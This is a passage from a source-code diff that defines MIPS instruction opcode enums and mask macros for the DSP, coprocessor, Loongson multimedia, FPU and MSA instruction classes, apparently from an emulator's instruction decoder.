(0x1F << 6))) +enum { + /* DSP Bit/Manipulation Sub-class */ + OPC_DINSV = (0x00 << 6) | OPC_DINSV_DSP, +}; + +#define MASK_DPAQ_W_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP Multiply Sub-class insns */ + OPC_DMADD = (0x19 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DMADDU = (0x1D << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DMSUB = (0x1B << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DMSUBU = (0x1F << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPA_W_QH = (0x00 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPAQ_S_W_QH = (0x04 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPAQ_SA_L_PW = (0x0C << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPAU_H_OBL = (0x03 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPAU_H_OBR = (0x07 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPS_W_QH = (0x01 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPSQ_S_W_QH = (0x05 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPSQ_SA_L_PW = (0x0D << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPSU_H_OBL = (0x0B << 6) | OPC_DPAQ_W_QH_DSP, + OPC_DPSU_H_OBR = (0x0F << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_L_PWL = (0x1C << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_L_PWR = (0x1E << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_W_QHLL = (0x14 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_SA_W_QHLL = (0x10 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_W_QHLR = (0x15 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_SA_W_QHLR = (0x11 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_W_QHRL = (0x16 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_SA_W_QHRL = (0x12 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_S_W_QHRR = (0x17 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MAQ_SA_W_QHRR = (0x13 << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MULSAQ_S_L_PW = (0x0E << 6) | OPC_DPAQ_W_QH_DSP, + OPC_MULSAQ_S_W_QH = (0x06 << 6) | OPC_DPAQ_W_QH_DSP, +}; + +#define MASK_SHLL_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) +enum { + /* MIPS DSP GPR-Based Shift Sub-class */ + OPC_SHLL_PW = (0x10 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLL_S_PW = (0x14 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLLV_OB = (0x02 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLLV_PW = (0x12 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLLV_S_PW = (0x16 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLLV_QH = (0x0A << 6) | OPC_SHLL_OB_DSP, + OPC_SHLLV_S_QH = (0x0E << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_PW = (0x11 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_R_PW = (0x15 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_OB = (0x06 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_R_OB = (0x07 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_PW = (0x13 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_R_PW = (0x17 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_QH = (0x0B << 6) | OPC_SHLL_OB_DSP, + OPC_SHRAV_R_QH = (0x0F << 6) | OPC_SHLL_OB_DSP, + OPC_SHRLV_OB = (0x03 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRLV_QH = (0x1B << 6) | OPC_SHLL_OB_DSP, + OPC_SHLL_OB = (0x00 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLL_QH = (0x08 << 6) | OPC_SHLL_OB_DSP, + OPC_SHLL_S_QH = (0x0C << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_OB = (0x04 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_R_OB = (0x05 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_QH = (0x09 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRA_R_QH = (0x0D << 6) | OPC_SHLL_OB_DSP, + OPC_SHRL_OB = (0x01 << 6) | OPC_SHLL_OB_DSP, + OPC_SHRL_QH = (0x19 << 6) | OPC_SHLL_OB_DSP, +}; + +/* Coprocessor 0 (rs field) */ +#define MASK_CP0(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21)) + +enum { + OPC_MFC0 = (0x00 << 21) | OPC_CP0, + OPC_DMFC0 = (0x01 << 21) | OPC_CP0, + OPC_MTC0 = (0x04 << 21) | OPC_CP0, + OPC_DMTC0 = (0x05 << 21) | OPC_CP0, + OPC_MFTR = (0x08 << 21) | OPC_CP0, + OPC_RDPGPR = (0x0A << 21) | OPC_CP0, + OPC_MFMC0 = (0x0B << 21) | OPC_CP0, + OPC_MTTR = (0x0C << 21) | OPC_CP0, + OPC_WRPGPR = (0x0E << 21) | OPC_CP0, + OPC_C0 = (0x10 << 21) | OPC_CP0, + OPC_C0_FIRST = (0x10 << 21) | OPC_CP0, + OPC_C0_LAST = (0x1F << 21) | OPC_CP0, +}; + +/* MFMC0 opcodes */ +#define MASK_MFMC0(op) MASK_CP0(op) | (op & 0xFFFF) + +enum { + OPC_DMT = 0x01 | (0 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, + OPC_EMT = 0x01 | (1 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, + OPC_DVPE = 0x01 | (0 << 5) | OPC_MFMC0, + OPC_EVPE = 0x01 | (1 << 5) | OPC_MFMC0, + OPC_DI = (0 << 5) | (0x0C << 11) | OPC_MFMC0, + OPC_EI = (1 << 5) | (0x0C << 11) | OPC_MFMC0, +}; + +/* Coprocessor 0 (with rs == C0) */ +#define MASK_C0(op) MASK_CP0(op) | (op & 0x3F) + +enum { + OPC_TLBR = 0x01 | OPC_C0, + OPC_TLBWI = 0x02 | OPC_C0, + OPC_TLBINV = 0x03 | OPC_C0, + OPC_TLBINVF = 0x04 | OPC_C0, + OPC_TLBWR = 0x06 | OPC_C0, + OPC_TLBP = 0x08 | OPC_C0, + OPC_RFE = 0x10 | OPC_C0, + OPC_ERET = 0x18 | OPC_C0, + OPC_DERET = 0x1F | OPC_C0, + OPC_WAIT = 0x20 | OPC_C0, +}; + +/* Coprocessor 1 (rs field) */ +#define MASK_CP1(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21)) + +/* Values for the fmt field in FP instructions */ +enum { + /* 0 - 15 are reserved */ + FMT_S = 16, /* single fp */ + FMT_D = 17, /* double fp */ + FMT_E = 18, /* extended fp */ + FMT_Q = 19, /* quad fp */ + FMT_W = 20, /* 32-bit fixed */ + FMT_L = 21, /* 64-bit fixed */ + FMT_PS = 22, /* paired single fp */ + /* 23 - 31 are reserved */ +}; + +enum { + OPC_MFC1 = (0x00 << 21) | OPC_CP1, + OPC_DMFC1 = (0x01 << 21) | OPC_CP1, + OPC_CFC1 = (0x02 << 21) | OPC_CP1, + OPC_MFHC1 = (0x03 << 21) | OPC_CP1, + OPC_MTC1 = (0x04 << 21) | OPC_CP1, + OPC_DMTC1 = (0x05 << 21) | OPC_CP1, + OPC_CTC1 = (0x06 << 21) | OPC_CP1, + OPC_MTHC1 = (0x07 << 21) | OPC_CP1, + OPC_BC1 = (0x08 << 21) | OPC_CP1, /* bc */ + OPC_BC1ANY2 = (0x09 << 21) | OPC_CP1, + OPC_BC1ANY4 = (0x0A << 21) | OPC_CP1, + OPC_BZ_V = (0x0B << 21) | OPC_CP1, + OPC_BNZ_V = (0x0F << 21) | OPC_CP1, + OPC_S_FMT = (FMT_S << 21) | OPC_CP1, + OPC_D_FMT = (FMT_D << 21) | OPC_CP1, + OPC_E_FMT = (FMT_E << 21) | OPC_CP1, + OPC_Q_FMT = (FMT_Q << 21) | OPC_CP1, + OPC_W_FMT = (FMT_W << 21) | OPC_CP1, + OPC_L_FMT = (FMT_L << 21) | OPC_CP1, + OPC_PS_FMT = (FMT_PS << 21) | OPC_CP1, + OPC_BC1EQZ = (0x09 << 21) | OPC_CP1, + OPC_BC1NEZ = (0x0D << 21) | OPC_CP1, + OPC_BZ_B = (0x18 << 21) | OPC_CP1, + OPC_BZ_H = (0x19 << 21) | OPC_CP1, + OPC_BZ_W = (0x1A << 21) | OPC_CP1, + OPC_BZ_D = (0x1B << 21) | OPC_CP1, + OPC_BNZ_B = (0x1C << 21) | OPC_CP1, + OPC_BNZ_H = (0x1D << 21) | OPC_CP1, + OPC_BNZ_W = (0x1E << 21) | OPC_CP1, + OPC_BNZ_D = (0x1F << 21) | OPC_CP1, +}; + +#define MASK_CP1_FUNC(op) MASK_CP1(op) | (op & 0x3F) +#define MASK_BC1(op) MASK_CP1(op) | (op & (0x3 << 16)) + +enum { + OPC_BC1F = (0x00 << 16) | OPC_BC1, + OPC_BC1T = (0x01 << 16) | OPC_BC1, + OPC_BC1FL = (0x02 << 16) | OPC_BC1, + OPC_BC1TL = (0x03 << 16) | OPC_BC1, +}; + +enum { + OPC_BC1FANY2 = (0x00 << 16) | OPC_BC1ANY2, + OPC_BC1TANY2 = (0x01 << 16) | OPC_BC1ANY2, +}; + +enum { + OPC_BC1FANY4 = (0x00 << 16) | OPC_BC1ANY4, + OPC_BC1TANY4 = (0x01 << 16) | OPC_BC1ANY4, +}; + +#define MASK_CP2(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21)) + +enum { + OPC_MFC2 = (0x00 << 21) | OPC_CP2, + OPC_DMFC2 = (0x01 << 21) | OPC_CP2, + OPC_CFC2 = (0x02 << 21) | OPC_CP2, + OPC_MFHC2 = (0x03 << 21) | OPC_CP2, + OPC_MTC2 = (0x04 << 21) | OPC_CP2, + OPC_DMTC2 = (0x05 << 21) | OPC_CP2, + OPC_CTC2 = (0x06 << 21) | OPC_CP2, + OPC_MTHC2 = (0x07 << 21) | OPC_CP2, + OPC_BC2 = (0x08 << 21) | OPC_CP2, + OPC_BC2EQZ = (0x09 << 21) | OPC_CP2, + OPC_BC2NEZ = (0x0D << 21) | OPC_CP2, +}; + +#define MASK_LMI(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21)) | (op & 0x1F)) + +enum { + OPC_PADDSH = (24 << 21) | (0x00) | OPC_CP2, + OPC_PADDUSH = (25 << 21) | (0x00) | OPC_CP2, + OPC_PADDH = (26 << 21) | (0x00) | OPC_CP2, + OPC_PADDW = (27 << 21) | (0x00) | OPC_CP2, + OPC_PADDSB = (28 << 21) | (0x00) | OPC_CP2, + OPC_PADDUSB = (29 << 21) | (0x00) | OPC_CP2, + OPC_PADDB = (30 << 21) | (0x00) | OPC_CP2, + OPC_PADDD = (31 << 21) | (0x00) | OPC_CP2, + + OPC_PSUBSH = (24 << 21) | (0x01) | OPC_CP2, + OPC_PSUBUSH = (25 << 21) | (0x01) | OPC_CP2, + OPC_PSUBH = (26 << 21) | (0x01) | OPC_CP2, + OPC_PSUBW = (27 << 21) | (0x01) | OPC_CP2, + OPC_PSUBSB = (28 << 21) | (0x01) | OPC_CP2, + OPC_PSUBUSB = (29 << 21) | (0x01) | OPC_CP2, + OPC_PSUBB = (30 << 21) | (0x01) | OPC_CP2, + OPC_PSUBD = (31 << 21) | (0x01) | OPC_CP2, + + OPC_PSHUFH = (24 << 21) | (0x02) | OPC_CP2, + OPC_PACKSSWH = (25 << 21) | (0x02) | OPC_CP2, + OPC_PACKSSHB = (26 << 21) | (0x02) | OPC_CP2, + OPC_PACKUSHB = (27 << 21) | (0x02) | OPC_CP2, + OPC_XOR_CP2 = (28 << 21) | (0x02) | OPC_CP2, + OPC_NOR_CP2 = (29 << 21) | (0x02) | OPC_CP2, + OPC_AND_CP2 = (30 << 21) | (0x02) | OPC_CP2, + OPC_PANDN = (31 << 21) | (0x02) | OPC_CP2, + + OPC_PUNPCKLHW = (24 << 21) | (0x03) | OPC_CP2, + OPC_PUNPCKHHW = (25 << 21) | (0x03) | OPC_CP2, + OPC_PUNPCKLBH = (26 << 21) | (0x03) | OPC_CP2, + OPC_PUNPCKHBH = (27 << 21) | (0x03) | OPC_CP2, + OPC_PINSRH_0 = (28 << 21) | (0x03) | OPC_CP2, + OPC_PINSRH_1 = (29 << 21) | (0x03) | OPC_CP2, + OPC_PINSRH_2 = (30 << 21) | (0x03) | OPC_CP2, + OPC_PINSRH_3 = (31 << 21) | (0x03) | OPC_CP2, + + OPC_PAVGH = (24 << 21) | (0x08) | OPC_CP2, + OPC_PAVGB = (25 << 21) | (0x08) | OPC_CP2, + OPC_PMAXSH = (26 << 21) | (0x08) | OPC_CP2, + OPC_PMINSH = (27 << 21) | (0x08) | OPC_CP2, + OPC_PMAXUB = (28 << 21) | (0x08) | OPC_CP2, + OPC_PMINUB = (29 << 21) | (0x08) | OPC_CP2, + + OPC_PCMPEQW = (24 << 21) | (0x09) | OPC_CP2, + OPC_PCMPGTW = (25 << 21) | (0x09) | OPC_CP2, + OPC_PCMPEQH = (26 << 21) | (0x09) | OPC_CP2, + OPC_PCMPGTH = (27 << 21) | (0x09) | OPC_CP2, + OPC_PCMPEQB = (28 << 21) | (0x09) | OPC_CP2, + OPC_PCMPGTB = (29 << 21) | (0x09) | OPC_CP2, + + OPC_PSLLW = (24 << 21) | (0x0A) | OPC_CP2, + OPC_PSLLH = (25 << 21) | (0x0A) | OPC_CP2, + OPC_PMULLH = (26 << 21) | (0x0A) | OPC_CP2, + OPC_PMULHH = (27 << 21) | (0x0A) | OPC_CP2, + OPC_PMULUW = (28 << 21) | (0x0A) | OPC_CP2, + OPC_PMULHUH = (29 << 21) | (0x0A) | OPC_CP2, + + OPC_PSRLW = (24 << 21) | (0x0B) | OPC_CP2, + OPC_PSRLH = (25 << 21) | (0x0B) | OPC_CP2, + OPC_PSRAW = (26 << 21) | (0x0B) | OPC_CP2, + OPC_PSRAH = (27 << 21) | (0x0B) | OPC_CP2, + OPC_PUNPCKLWD = (28 << 21) | (0x0B) | OPC_CP2, + OPC_PUNPCKHWD = (29 << 21) | (0x0B) | OPC_CP2, + + OPC_ADDU_CP2 = (24 << 21) | (0x0C) | OPC_CP2, + OPC_OR_CP2 = (25 << 21) | (0x0C) | OPC_CP2, + OPC_ADD_CP2 = (26 << 21) | (0x0C) | OPC_CP2, + OPC_DADD_CP2 = (27 << 21) | (0x0C) | OPC_CP2, + OPC_SEQU_CP2 = (28 << 21) | (0x0C) | OPC_CP2, + OPC_SEQ_CP2 = (29 << 21) | (0x0C) | OPC_CP2, + + OPC_SUBU_CP2 = (24 << 21) | (0x0D) | OPC_CP2, + OPC_PASUBUB = (25 << 21) | (0x0D) | OPC_CP2, + OPC_SUB_CP2 = (26 << 21) | (0x0D) | OPC_CP2, + OPC_DSUB_CP2 = (27 << 21) | (0x0D) | OPC_CP2, + OPC_SLTU_CP2 = (28 << 21) | (0x0D) | OPC_CP2, + OPC_SLT_CP2 = (29 << 21) | (0x0D) | OPC_CP2, + + OPC_SLL_CP2 = (24 << 21) | (0x0E) | OPC_CP2, + OPC_DSLL_CP2 = (25 << 21) | (0x0E) | OPC_CP2, + OPC_PEXTRH = (26 << 21) | (0x0E) | OPC_CP2, + OPC_PMADDHW = (27 << 21) | (0x0E) | OPC_CP2, + OPC_SLEU_CP2 = (28 << 21) | (0x0E) | OPC_CP2, + OPC_SLE_CP2 = (29 << 21) | (0x0E) | OPC_CP2, + + OPC_SRL_CP2 = (24 << 21) | (0x0F) | OPC_CP2, + OPC_DSRL_CP2 = (25 << 21) | (0x0F) | OPC_CP2, + OPC_SRA_CP2 = (26 << 21) | (0x0F) | OPC_CP2, + OPC_DSRA_CP2 = (27 << 21) | (0x0F) | OPC_CP2, + OPC_BIADD = (28 << 21) | (0x0F) | OPC_CP2, + OPC_PMOVMSKB = (29 << 21) | (0x0F) | OPC_CP2, +}; + + +#define MASK_CP3(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + OPC_LWXC1 = 0x00 | OPC_CP3, + OPC_LDXC1 = 0x01 | OPC_CP3, + OPC_LUXC1 = 0x05 | OPC_CP3, + OPC_SWXC1 = 0x08 | OPC_CP3, + OPC_SDXC1 = 0x09 | OPC_CP3, + OPC_SUXC1 = 0x0D | OPC_CP3, + OPC_PREFX = 0x0F | OPC_CP3, + OPC_ALNV_PS = 0x1E | OPC_CP3, + OPC_MADD_S = 0x20 | OPC_CP3, + OPC_MADD_D = 0x21 | OPC_CP3, + OPC_MADD_PS = 0x26 | OPC_CP3, + OPC_MSUB_S = 0x28 | OPC_CP3, + OPC_MSUB_D = 0x29 | OPC_CP3, + OPC_MSUB_PS = 0x2E | OPC_CP3, + OPC_NMADD_S = 0x30 | OPC_CP3, + OPC_NMADD_D = 0x31 | OPC_CP3, + OPC_NMADD_PS= 0x36 | OPC_CP3, + OPC_NMSUB_S = 0x38 | OPC_CP3, + OPC_NMSUB_D = 0x39 | OPC_CP3, + OPC_NMSUB_PS= 0x3E | OPC_CP3, +}; + +/* MSA Opcodes */ +#define MASK_MSA_MINOR(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) +enum { + OPC_MSA_I8_00 = 0x00 | OPC_MSA, + OPC_MSA_I8_01 = 0x01 | OPC_MSA, + OPC_MSA_I8_02 = 0x02 | OPC_MSA, + OPC_MSA_I5_06 = 0x06 | OPC_MSA, + OPC_MSA_I5_07 = 0x07 | OPC_MSA, + OPC_MSA_BIT_09 = 0x09 | OPC_MSA, + OPC_MSA_BIT_0A = 0x0A | OPC_MSA, + OPC_MSA_3R_0D = 0x0D | OPC_MSA, + OPC_MSA_3R_0E = 0x0E | OPC_MSA, + OPC_MSA_3R_0F = 0x0F | OPC_MSA, + OPC_MSA_3R_10 = 0x10 | OPC_MSA, + OPC_MSA_3R_11 = 0x11 | OPC_MSA, + OPC_MSA_3R_12 = 0x12 | OPC_MSA, + OPC_MSA_3R_13 = 0x13 | OPC_MSA, + OPC_MSA_3R_14 = 0x14 | OPC_MSA, + OPC_MSA_3R_15 = 0x15 | OPC_MSA, + OPC_MSA_ELM = 0x19 | OPC_MSA, + OPC_MSA_3RF_1A = 0x1A | OPC_MSA, + OPC_MSA_3RF_1B = 0x1B | OPC_MSA, + OPC_MSA_3RF_1C = 0x1C | OPC_MSA, + OPC_MSA_VEC = 0x1E | OPC_MSA, + + /* MI10 instruction */ + OPC_LD_B = (0x20) | OPC_MSA, + OPC_LD_H = (0x21) | OPC_MSA, + OPC_LD_W = (0x22) | OPC_MSA, + OPC_LD_D = (0x23) | OPC_MSA, + OPC_ST_B = (0x24) | OPC_MSA, + OPC_ST_H = (0x25) | OPC_MSA, + OPC_ST_W = (0x26) | OPC_MSA, + OPC_ST_D = (0x27) | OPC_MSA, +}; + +enum { + /* I5 instruction df(bits 22..21) = _b, _h, _w, _d */ + OPC_ADDVI_df = (0x0 << 23) | OPC_MSA_I5_06, + OPC_CEQI_df = (0x0 << 23) | OPC_MSA_I5_07, + OPC_SUBVI_df = (0x1 << 23) | OPC_MSA_I5_06, + OPC_MAXI_S_df = (0x2 << 23) | OPC_MSA_I5_06, + OPC_CLTI_S_df = (0x2 << 23) | OPC_MSA_I5_07, + OPC_MAXI_U_df = (0x3 << 23) | OPC_MSA_I5_06, + OPC_CLTI_U_df = (0x3 << 23) | OPC_MSA_I5_07, + OPC_MINI_S_df = (0x4 << 23) | OPC_MSA_I5_06, + OPC_CLEI_S_df = (0x4 << 23) | OPC_MSA_I5_07, + OPC_MINI_U_df = (0x5 << 23) | OPC_MSA_I5_06, + OPC_CLEI_U_df = (0x5 << 23) | OPC_MSA_I5_07, + OPC_LDI_df = (0x6 << 23) | OPC_MSA_I5_07, + + /* I8 instruction */ + OPC_ANDI_B = (0x0 << 24) | OPC_MSA_I8_00, + OPC_BMNZI_B = (0x0 << 24) | OPC_MSA_I8_01, + OPC_SHF_B = (0x0 << 24) | OPC_MSA_I8_02, + OPC_ORI_B = (0x1 << 24) | OPC_MSA_I8_00, + OPC_BMZI_B = (0x1 << 24) | OPC_MSA_I8_01, + OPC_SHF_H = (0x1 << 24) | OPC_MSA_I8_02, + OPC_NORI_B = (0x2 << 24) | OPC_MSA_I8_00, + OPC_BSELI_B = (0x2 << 24) | OPC_MSA_I8_01, + OPC_SHF_W = (0x2 << 24) | OPC_MSA_I8_02, + OPC_XORI_B = (0x3 << 24) | OPC_MSA_I8_00, + + /* VEC/2R/2RF instruction */ + OPC_AND_V = (0x00 << 21) | OPC_MSA_VEC, + OPC_OR_V = (0x01 << 21) | OPC_MSA_VEC, + OPC_NOR_V = (0x02 << 21) | OPC_MSA_VEC, + OPC_XOR_V = (0x03 << 21) | OPC_MSA_VEC, + OPC_BMNZ_V = (0x04 << 21) | OPC_MSA_VEC, + OPC_BMZ_V = (0x05 << 21) | OPC_MSA_VEC, + OPC_BSEL_V = (0x06 << 21) | OPC_MSA_VEC, + + OPC_MSA_2R = (0x18 << 21) | OPC_MSA_VEC, + OPC_MSA_2RF = (0x19 << 21) | OPC_MSA_VEC, + + /* 2R instruction df(bits 17..16) = _b, _h, _w, _d */ + OPC_FILL_df = (0x00 << 18) | OPC_MSA_2R, + OPC_PCNT_df = (0x01 << 18) | OPC_MSA_2R, + OPC_NLOC_df = (0x02 << 18) | OPC_MSA_2R, + OPC_NLZC_df = (0x03 << 18) | OPC_MSA_2R, + + /* 2RF instruction df(bit 16) = _w, _d */ + OPC_FCLASS_df = (0x00 << 17) | OPC_MSA_2RF, + OPC_FTRUNC_S_df = (0x01 << 17) | OPC_MSA_2RF, + OPC_FTRUNC_U_df = (0x02 << 17) | OPC_MSA_2RF, + OPC_FSQRT_df = (0x03 << 17) | OPC_MSA_2RF, + OPC_FRSQRT_df = (0x04 << 17) | OPC_MSA_2RF, + OPC_FRCP_df = (0x05 << 17) | OPC_MSA_2RF, + OPC_FRINT_df = (0x06 << 17) | OPC_MSA_2RF, + OPC_FLOG2_df = (0x07 << 17) | OPC_MSA_2RF, + OPC_FEXUPL_df = (0x08 << 17) | OPC_MSA_2RF, + OPC_FEXUPR_df = (0x09 << 17) | OPC_MSA_2RF, + OPC_FFQL_df = (0x0A << 17) | OPC_MSA_2RF, + OPC_FFQR_df = (0x0B << 17) | OPC_MSA_2RF, + OPC_FTINT_S_df = (0x0C << 17) | OPC_MSA_2RF, + OPC_FTINT_U_df = (0x0D << 17) | OPC_MSA_2RF, + OPC_FFINT_S_df = (0x0E << 17) | OPC_MSA_2RF, + OPC_FFINT_U_df = (0x0F << 17) | OPC_MSA_2RF, + + /* 3R instruction df(bits 22..21) = _b, _h, _w, d */ + OPC_SLL_df = (0x0 << 23) | OPC_MSA_3R_0D, + OPC_ADDV_df = (0x0 << 23) | OPC_MSA_3R_0E, + OPC_CEQ_df = (0x0 << 23) | OPC_MSA_3R_0F, + OPC_ADD_A_df = (0x0 << 23) | OPC_MSA_3R_10, + OPC_SUBS_S_df = (0x0 << 23) | OPC_MSA_3R_11, + OPC_MULV_df = (0x0 << 23) | OPC_MSA_3R_12, + OPC_DOTP_S_df = (0x0 << 23) | OPC_MSA_3R_13, + OPC_SLD_df = (0x0 << 23) | OPC_MSA_3R_14, + OPC_VSHF_df = (0x0 << 23) | OPC_MSA_3R_15, + OPC_SRA_df = (0x1 << 23) | OPC_MSA_3R_0D, + OPC_SUBV_df = (0x1 << 23) | OPC_MSA_3R_0E, + OPC_ADDS_A_df = (0x1 << 23) | OPC_MSA_3R_10, + OPC_SUBS_U_df = (0x1 << 23) | OPC_MSA_3R_11, + OPC_MADDV_df = (0x1 << 23) | OPC_MSA_3R_12, + OPC_DOTP_U_df = (0x1 << 23) | OPC_MSA_3R_13, + OPC_SPLAT_df = (0x1 << 23) | OPC_MSA_3R_14, + OPC_SRAR_df = (0x1 << 23) | OPC_MSA_3R_15, + OPC_SRL_df = (0x2 << 23) | OPC_MSA_3R_0D, + OPC_MAX_S_df = (0x2 << 23) | OPC_MSA_3R_0E, + OPC_CLT_S_df = (0x2 << 23) | OPC_MSA_3R_0F, + OPC_ADDS_S_df = (0x2 << 23) | OPC_MSA_3R_10, + OPC_SUBSUS_U_df = (0x2 << 23) | OPC_MSA_3R_11, + OPC_MSUBV_df = (0x2 << 23) | OPC_MSA_3R_12, + OPC_DPADD_S_df = (0x2 << 23) | OPC_MSA_3R_13, + OPC_PCKEV_df = (0x2 << 23) | OPC_MSA_3R_14, + OPC_SRLR_df = (0x2 << 23) | OPC_MSA_3R_15, + OPC_BCLR_df = (0x3 << 23) | OPC_MSA_3R_0D, + OPC_MAX_U_df = (0x3 << 23) | OPC_MSA_3R_0E, + OPC_CLT_U_df = (0x3 << 23) | OPC_MSA_3R_0F, + OPC_ADDS_U_df = (0x3 << 23) | OPC_MSA_3R_10, + OPC_SUBSUU_S_df = (0x3 << 23) | OPC_MSA_3R_11, + OPC_DPADD_U_df = (0x3 << 23) | OPC_MSA_3R_13, + OPC_PCKOD_df = (0x3 << 23) | OPC_MSA_3R_14, + OPC_BSET_df = (0x4 << 23) | OPC_MSA_3R_0D, + OPC_MIN_S_df = (0x4 << 23) | OPC_MSA_3R_0E, + OPC_CLE_S_df = (0x4 << 23) | OPC_MSA_3R_0F, + OPC_AVE_S_df = (0x4 << 23) | OPC_MSA_3R_10, + OPC_ASUB_S_df = (0x4 << 23) | OPC_MSA_3R_11, + OPC_DIV_S_df = (0x4 << 23) | OPC_MSA_3R_12, + OPC_DPSUB_S_df = (0x4 << 23) | OPC_MSA_3R_13, + OPC_ILVL_df = (0x4 << 23) | OPC_MSA_3R_14, + OPC_HADD_S_df = (0x4 << 23) | OPC_MSA_3R_15, + OPC_BNEG_df = (0x5 << 23) | OPC_MSA_3R_0D, + OPC_MIN_U_df = (0x5 << 23) | OPC_MSA_3R_0E, + OPC_CLE_U_df = (0x5 << 23) | OPC_MSA_3R_0F, + OPC_AVE_U_df = (0x5 << 23) | OPC_MSA_3R_10, + OPC_ASUB_U_df = (0x5 << 23) | OPC_MSA_3R_11, + OPC_DIV_U_df = (0x5 << 23) | OPC_MSA_3R_12, + OPC_DPSUB_U_df = (0x5 << 23) | OPC_MSA_3R_13, + OPC_ILVR_df = (0x5 << 23) | OPC_MSA_3R_14, + OPC_HADD_U_df = (0x5 << 23) | OPC_MSA_3R_15, + OPC_BINSL_df = (0x6 << 23) | OPC_MSA_3R_0D, + OPC_MAX_A_df = (0x6 << 23) | OPC_MSA_3R_0E, + OPC_AVER_S_df = (0x6 << 23) | OPC_MSA_3R_10, + OPC_MOD_S_df = (0x6 << 23) | OPC_MSA_3R_12, + OPC_ILVEV_df = (0x6 << 23) | OPC_MSA_3R_14, + OPC_HSUB_S_df = (0x6 << 23) | OPC_MSA_3R_15, + OPC_BINSR_df = (0x7 << 23) | OPC_MSA_3R_0D, + OPC_MIN_A_df = (0x7 << 23) | OPC_MSA_3R_0E, + OPC_AVER_U_df = (0x7 << 23) | OPC_MSA_3R_10, + OPC_MOD_U_df = (0x7 << 23) | OPC_MSA_3R_12, + OPC_ILVOD_df = (0x7 << 23) | OPC_MSA_3R_14, + OPC_HSUB_U_df = (0x7 << 23) | OPC_MSA_3R_15, + + /* ELM instructions df(bits 21..16) = _b, _h, _w, _d */ + OPC_SLDI_df = (0x0 << 22) | (0x00 << 16) | OPC_MSA_ELM, + OPC_CTCMSA = (0x0 << 22) | (0x3E << 16) | OPC_MSA_ELM, + OPC_SPLATI_df = (0x1 << 22) | (0x00 << 16) | OPC_MSA_ELM, + OPC_CFCMSA = (0x1 << 22) | (0x3E << 16) | OPC_MSA_ELM, + OPC_COPY_S_df = (0x2 << 22) | (0x00 << 16) | OPC_MSA_ELM, + OPC_MOVE_V = (0x2 << 22) | (0x3E << 16) | OPC_MSA_ELM, + OPC_COPY_U_df = (0x3 << 22) | (0x00 << 16) | OPC_MSA_ELM, + OPC_INSERT_df = (0x4 << 22) | (0x00 << 16) | OPC_MSA_ELM, + OPC_INSVE_df = (0x5 << 22) | (0x00 << 16) | OPC_MSA_ELM, + + /* 3RF instruction _df(bit 21) = _w, _d */ + OPC_FCAF_df = (0x0 << 22) | OPC_MSA_3RF_1A, + OPC_FADD_df = (0x0 << 22) | OPC_MSA_3RF_1B, + OPC_FCUN_df = (0x1 << 22) | OPC_MSA_3RF_1A, + OPC_FSUB_df = (0x1 << 22) | OPC_MSA_3RF_1B, + OPC_FCOR_df = (0x1 << 22) | OPC_MSA_3RF_1C, + OPC_FCEQ_df = (0x2 << 22) | OPC_MSA_3RF_1A, + OPC_FMUL_df = (0x2 << 22) | OPC_MSA_3RF_1B, + OPC_FCUNE_df = (0x2 << 22) | OPC_MSA_3RF_1C, + OPC_FCUEQ_df = (0x3 << 22) | OPC_MSA_3RF_1A, + OPC_FDIV_df = (0x3 << 22) | OPC_MSA_3RF_1B, + OPC_FCNE_df = (0x3 << 22) | OPC_MSA_3RF_1C, + OPC_FCLT_df = (0x4 << 22) | OPC_MSA_3RF_1A, + OPC_FMADD_df = (0x4 << 22) | OPC_MSA_3RF_1B, + OPC_MUL_Q_df = (0x4 << 22) | OPC_MSA_3RF_1C, + OPC_FCULT_df = (0x5 << 22) | OPC_MSA_3RF_1A, + 